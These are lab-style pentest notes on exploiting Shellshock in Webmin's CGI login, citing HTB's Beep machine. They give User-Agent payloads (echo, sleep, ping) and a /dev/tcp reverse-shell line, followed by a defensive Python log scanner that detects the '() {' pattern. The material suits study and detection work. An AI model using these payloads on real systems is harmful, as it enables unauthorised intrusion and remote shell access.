Port 10000 Webmin

Webmin uses CGI files and is vulnerable to Shellshock, e.g. Beep on HTB.

From the Webmin login panel, initiate a login request and intercept it in Burp. Send it to Repeater.

Now set the User-Agent header to a Shellshock string and try the following payloads:

() { :; };/bin/echo heloo
() { :; }; sleep 10   (this did work, as a kind of blind Shellshock)

Now check with ping:

() { :; };ping -c 1
On our machine:
sudo tcpdump -i tun0 -v

And we get the ping, so let's try a reverse shell.

sh -i >& /dev/tcp/ 0>&1
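
A defender-side counterpart to the requests above, as an added example that is not part of the original notes: a Python scan of web access logs for the `() {` function-definition prefix in the User-Agent or Referer fields, including percent-encoded variants. It assumes the server writes Combined Log Format lines; the sample log lines and the name find_shellshock are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A Bash function definition inside a header value: "() {" with optional spaces.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "POST /session_login.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "POST /session_login.cgi HTTP/1.1" 500 0 "-" "() { :; };/bin/echo heloo"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "POST /session_login.cgi HTTP/1.1" 500 0 "-" "%28%29%20%7B%20:;%20%7D;%20sleep%2010"
192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET / HTTP/1.1" 200 1024 "() { :; }; sleep 10" "curl/8.0"
"""

def find_shellshock(log_text):
    """Return one dict per Referer/User-Agent value that carries '() {'."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        for field in ("referer", "agent"):
            value = unquote(m.group(field))  # catch percent-encoded variants
            if SHELLSHOCK_RE.search(value):
                hits.append({"line": lineno, "ip": m.group("ip"),
                             "request": m.group("request"),
                             "field": field, "value": value})
    return hits

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f'{hit["line"]}: {hit["ip"]} {hit["field"]}={hit["value"]!r}')
```

A hit only shows that a request carried the pattern; whether the host was affected depends on the Bash version behind the CGI handler.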
